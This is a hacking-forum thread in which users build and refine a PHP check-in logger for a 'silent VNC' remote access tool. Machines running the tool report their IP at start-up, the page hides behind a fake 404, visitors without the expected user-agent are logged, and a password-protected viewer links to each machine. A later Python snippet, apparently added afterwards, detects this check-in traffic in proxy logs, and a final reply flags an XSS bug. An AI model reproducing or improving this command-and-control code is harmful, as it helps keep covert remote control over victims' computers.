EvilZone
Programming and Scripting => Web Oriented Coding => : bubzuru November 13, 2011, 04:23:29 AM
-
<?php
if(isset($_GET["log"])){
    $ipfile = 'ips.txt'; //make this filename random, dont want people stealing your servers
    $ip = $_SERVER['REMOTE_ADDR']; //the ip address of the vnc server
    //read all our server ips into a string
    $lines = file_get_contents($ipfile,true);
    //check if the server ip is already in the string
    if(strpos($lines,$ip) !== false) { //fucked up strpos ,, ip might be on the first line (!==)
        //do nothing ,, i suck at php, this is what 3yrs does to you
    }else{
        $fh = fopen($ipfile, 'a') or die("Make the ip file"); //open ip file
        fwrite($fh, $ip."\r\n"); //write server ip to end of file. put on new line for later use (table, foreach ?)
        fclose($fh); //close our ip file
    }
}
?>
ok so i've coded a basic ip logger for silent vnc
the server will visit the logger "?log=1" every time it starts up.
the logger works fine , but can anyone make it better , more functional
maybe add a "server viewer (with password ,nice ui)" just list the ips in a table or some shit, just make it better , anyone who helps will get credit , have fun :)
-
I would suggest a fake 404, example on apache:
<?php
// your code
header("HTTP/1.1 404 Not Found");
// attempt to match headers to your HTTP server
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER["REQUEST_URI"]; ?> was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["SERVER_NAME"]." Port ".$_SERVER["SERVER_PORT"]; ?></address>
</body></html>
-- nothing to see here, move along.
-
idea added , makes sense thanx
-
- Cypher those IPs using a password as key.
- Use a custom user-agent for legit VNC connections. If not matching, log it too in another file. You may want to know who is trying to look at your shit.
- Use SQL instead of a text file. Easier to sort and view.
Something like this (coded here, not tested, incomplete, and putting it together with xzid's idea):
<?php
$con=mysql_connect("user", "pass", "server");
mysql_select_db("logs", $con);
$ip=cryptMyShit($_SERVER['REMOTE_ADDR']);
if($_SERVER['HTTP_USER_AGENT']=="SilentVNC")
{
    $res=mysql_query("SELECT id FROM logs WHERE ip = '".$ip."'");
    if(($row=mysql_fetch_row($res))==FALSE)
        mysql_query("INSERT INTO logs (ip) VALUES (".$ip.");");
}
else
    mysql_query("INSERT INTO fuckerz (ip) VALUES (".$ip.");");
header("HTTP/1.1 404 Not Found");
// attempt to match headers to your HTTP server
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER["REQUEST_URI"]; ?> was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["SERVER_NAME"]." Port ".$_SERVER["SERVER_PORT"]; ?></address>
</body></html>
-
ok thanx for the input
Encrypted Ips\Server Info : to be added (next version)
Custom UserAgent : adding it to the ip logger now ( php script will just discard wrong ua's (for now) )
SQL: setting up a sql server may be too advanced for my user base , just going to use text files (easy setup , i dont need to do anything too advanced with the data anyway)
here is the current script
<?php
//
//
//
$viewpass = "password"; //viewer password goto logger.php?view=password
$ipfile = 'ips.txt'; //make this filename random, dont want people stealing your servers
if(isset($_GET["log"])){
    $ip = $_SERVER['REMOTE_ADDR']; //the ip address of the vnc server
    //read all our server ips into a string
    $lines = file_get_contents($ipfile,true);
    //check if the server ip is already in the string
    if(strpos($lines,$ip) !== false) { //fucked up strpos ,, ip might be on the first line (!==)
        //do nothing ,, i suck at php, this is what 3yrs does to you
    }else{
        $fh = fopen($ipfile, 'a') or die("Make the ip file"); //open ip file
        fwrite($fh, $ip.":".$_GET['id']."\r\n"); //write server ip\info to end of file. put on new line for later use (table, foreach ?)
        fclose($fh); //close our ip file
    }
}elseif(isset($_GET["view"]) && $_GET["view"] == $viewpass){
    $lines = file($ipfile);
    echo "<center><table border='1' cellpadding='8'>\n";
    echo "<tr>\n";
    echo " <td>Server Num</td>\n";
    echo " <td>Server Ip</td>\n";
    echo " <td>Server Info</td>\n";
    echo "</tr>\n";
    foreach ($lines as $line_num => $line) {
        $split = explode(":",$line);
        echo "<tr>\n";
        echo " <td><font color='blue'> Server " . $line_num . "</font> : </td>\n";
        echo " <td> <a href='http://".$split[0].":5800' target='_blank'>" . $split[0] . "</a></td>\n" ;
        echo " <td>".$split[1]."</td>\n";
        echo "</tr>\n";
    }
    echo "</table></center>\n";
    exit(1);
}
header("HTTP/1.1 404 Not Found");
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER["REQUEST_URI"]; ?> was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["SERVER_NAME"]." Port ".$_SERVER["SERVER_PORT"]; ?></address>
</body></html>
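Seen from the network side, the check-in this thread describes (a GET to a PHP script carrying `log`, optionally `id`, answered with a 404, possibly sent with the `SilentVNC` User-Agent) can be matched in web proxy logs. The following is an added example, not code from the thread; the combined log format, the constructed sample lines and hosts, and the two-trait threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (combined log format); hosts and addresses are made up.
SAMPLE_LOG = '''\
10.0.4.17 - - [13/Nov/2011:04:30:01 +0000] "GET http://host.example/logger.php?log=1&id=PC-7 HTTP/1.1" 404 312 "-" "SilentVNC"
10.0.4.17 - - [14/Nov/2011:08:02:44 +0000] "GET http://host.example/logger.php?log=1&id=PC-7 HTTP/1.1" 404 312 "-" "SilentVNC"
10.0.4.22 - - [14/Nov/2011:09:15:10 +0000] "GET http://shop.example/old-page HTTP/1.1" 404 512 "-" "Mozilla/5.0"
10.0.4.30 - - [14/Nov/2011:09:20:31 +0000] "GET http://app.example/audit.php?log=3 HTTP/1.1" 200 9001 "http://app.example/" "Mozilla/5.0"
'''

# Assumed layout: client, two ignored fields, [time], "request", status, size, "referer", "ua".
LINE_RE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def checkin_signals(line):
    """Return (client, traits) where traits are the check-in traits seen in one line."""
    m = LINE_RE.match(line)
    if not m:
        return None, set()
    url = urlsplit(m["url"])
    query = parse_qs(url.query, keep_blank_values=True)
    signals = set()
    if m["method"] == "GET" and url.path.endswith(".php") and "log" in query:
        signals.add("log-param")            # the "?log=1" start-up visit
        if m["status"] == "404":
            signals.add("404-on-checkin")   # the script answers its own request with 404
    if m["ua"] == "SilentVNC":
        signals.add("custom-ua")            # UA string suggested in the thread
    return m["client"], signals

def suspicious_clients(log_text, min_signals=2):
    """Group lines showing at least min_signals traits by internal client address."""
    hits = {}
    for line in log_text.splitlines():
        client, signals = checkin_signals(line)
        if len(signals) >= min_signals:
            entry = hits.setdefault(client, {"signals": set(), "count": 0})
            entry["signals"] |= signals
            entry["count"] += 1
    return hits
```

Requiring two traits keeps an ordinary page that takes `?log=` and returns 200, and a plain 404 without the parameter, out of the results.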
-
..
fwrite($fh, $ip.":".$_GET['id']."\r\n");
..
echo " <td>".$split[1]."</td>\n";
..
XSS.
Quick fix:
echo " <td>".htmlentities($split[1], ENT_QUOTES)."</td>\n";